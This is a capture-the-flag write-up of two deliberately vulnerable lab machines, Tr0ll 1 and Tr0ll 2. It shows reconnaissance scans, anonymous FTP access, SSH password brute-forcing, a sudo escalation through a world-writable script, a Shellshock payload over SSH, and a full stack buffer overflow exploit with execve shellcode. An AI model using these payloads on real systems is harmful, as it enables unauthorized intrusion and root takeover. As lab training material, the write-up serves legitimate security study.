Tr0ll Write-Up

What follows is a write-up of two vulnerable machines, Tr0ll 1 and Tr0ll 2.

Tr0ll was inspired by the constant trolling of the machines within the OSCP labs.

The goal is simple, gain root and get Proof.txt from the /root directory.

[*] STATUS: COMPLETED

Tr0ll 1 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
”’
Note the following ports and services are up and running:
ftp vsftpd 3.0.2
ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
http Apache httpd 2.4.7 ((Ubuntu))

”’

2) nikto -h 192.168.189.197
# It found a ‘/secret/’ directory mentioned in robots.txt which might be interesting
3) Browse to: 192.168.189.197
# Got trolled. Nice one.
# Let’s try attacking through ftp

4) ftp 192.168.189.197 -> anonymous:anonymous
# We’re in
5) ls -> get lol.pcap -> exit
6) strings lol.pcap
# Note: you almost found the sup3rs3cr3tdirlol 😛
7) Browse to: http://192.168.189.197/sup3rs3cr3tdirlol/
8) Download the binary
9) strings roflmao
# Note: Find address 0x0856BF to proceed
10) Browse to: http://192.168.189.197/0x0856BF/
11) Click on ‘good_luck’ -> which_one_lol.txt
12) wget http://192.168.189.197/0x0856BF/good_luck/which_one_lol.txt
12) Click on ‘this_folder_contains_the_password/’ -> Pass.txt
# Note: Either ‘Pass.txt’ or its contents ‘Good_job_:)’ could be the password
13) medusa -U which_one_lol.txt -p Pass.txt -h 192.168.189.197 -M ssh
# We found our way in
14) ssh overflow@192.168.189.197 -> Pass: Pass.txt
# We’re in
15) cat root/Proof.txt
# Permission denied, we’re going to have to do privilege escalation
16) find / -perm -o+w
# Searching for world writable files
# That /lib/log/cleaner.py file near the end looks interesting
17) vi /lib/log/cleaner.py
Modify the try:
os.system(‘usermod -aG sudo overflow’)

# Initially the modification didn’t seem to work, but by the third log on
# (it kept kicking us out) we finally became a sudoer
18) id
# Became a sudoer
19) sudo ls /root
20) sudo cat /root/proof.txt
# Got the flag

Flag: 702a8c18d29c6f3ca0d99ef5712bfbdc

End-Notes:
Pretty funny box, though slightly annoying when it kept logging us out. Fun overall.

 

Tr0ll 2 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
”’
Note the following ports and services are up and running:
ftp vsftpd 2.0.8 or later
ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
http Apache httpd 2.2.22 ((Ubuntu))

Also notice that there were two network adapters. Perhaps some chaining?

”’

2) Browse to: 192.168.189.204
3) nikto -h 192.168.189.204
”’
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15.

”’

4) wfuzz –hc 404 -c -z file,/usr/share/wfuzz/wordlist/general/big.txt http://192.168.189.204/FUZZ
# Fuzzing for directories – only index came up

5) Browse to: http://192.168.189.204/robots.txt

6) wfuzz –hc 404 -c -z file,/root/Documents/wargames/tr0ll/list.txt http://192.168.189.204/FUZZ

”’
Out of all the URLs only the following seem to work:
http://192.168.189.204/noob/
http://192.168.189.204/keep_trying/
http://192.168.189.204/dont_bother/
http://192.168.189.204/ok_this_is_it/

The filename of the images is: cat_the_troll
”’

7) Download all the images
8) tail -n 1 cat_the_troll.jpg cat_the_troll.jpg.1 cat_the_troll.jpg.2 cat_the_troll.jpg.3
# Notice on the third image (dont_bother) we get:
# Look Deep within y0ur_self for the answer

9) Browse to: http://192.168.189.204/y0ur_self/
10) wget http://192.168.189.204/y0ur_self/answer.txt
11) cat answer.txt | base64 -d > the_answer.txt
12) gedit the_answer.txt
# It’s a bunch of repeated words
13) uniq -u the_answer.txt > answerz.txt
14) gedit answerz.txt
# Notice the following string: ItCantReallyBeThisEasyRightLOL
# After trying it on the web app, ftp, and ssh, I decided to move on
15) ftp 192.168.189.204 -> Tr0ll:Tr0ll
# It was this easy

16) ls -> get lmao.zip -> exit
17) unzip lmao.zip
# It’s password encrypted
# The password is: ItCantReallyBeThisEasyRightLOL

18) file noob
# noob: PEM RSA private key
# This might very well be to log in via ssh

19) ssh noob@192.168.189.204 -i noob
# It prints out “TRY HARDER LOL!” and closes the connection
# Looks like it’s forcing this command (echo) to be run once we log in

20) Search for ‘ssh exploit’
21) Read: http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
# We can use the shellshock exploit to run other commands

22) ssh noob@192.168.189.204 -i noob ‘() { :;}; /bin/bash’
23) id
# We’re in
24) pwd -> cd ../ -> ls -> ls tr0ll
# There’s a lmao.zip
25) cd / -> ls -> ls nothing_to_see_here -> ls nothing_to_see_here/choose_wisely
26) cd nothing_to_see_here/choose_wisely
27) ls door1 -> ls door2 -> ls door3
28) file door1/r00t -> file door2/r00t -> file door3/r00t
”’
After running all three files, we get the following:
– door1 r00t lets us input data
– door2 prints:
Good job, stand by, executing root shell…
BUHAHAHA NOOB!

– door3 r00t prints: 2 MINUTE HARD MODE LOL, and then bricks the system

Let’s go with door1. Binary exploitation?
”’

29) cd door1
30) gdb -q ./r00t
31) run $(python -c ‘print “A” * 500’)
# We get a segmentation fault
32) run $(python -c ‘print “A” * 300’)
33) run $(python -c ‘print “A” * 200’)
34) run $(python -c ‘print “A” * 250’)
35) run $(python -c ‘print “A” * 270’)
36) run $(python -c ‘print “A” * 268 + “B” * 4’)
# We control EIP

37) disas main
38) br *main+97
# Setting a breakpoint at leave
39) run $(python -c ‘print “A” * 268 + “B” * 4′)
40) x/100x $esp
”’
Notice where our A’s start
We can now load and run our shellcode

Let’s use execve /bin/sh shellcode I wrote, which is 25 bytes in size
”’

41) run $(python -c ‘print “A” * 268 + “\x80\xfb\xff\xbf” + “\x90” * 20 + “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″‘)
# Confirming it works

42) ./r00t $(python -c ‘print “A” * 268 + “\x80\xfb\xff\xbf” + “\x90” * 20 + “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″‘)

43) whoami
44) cat /root/Proof.txt
# Got the flag

Flag: a70354f0258dcc00292c72aab3c8b1e4

End-Notes:
Fun box!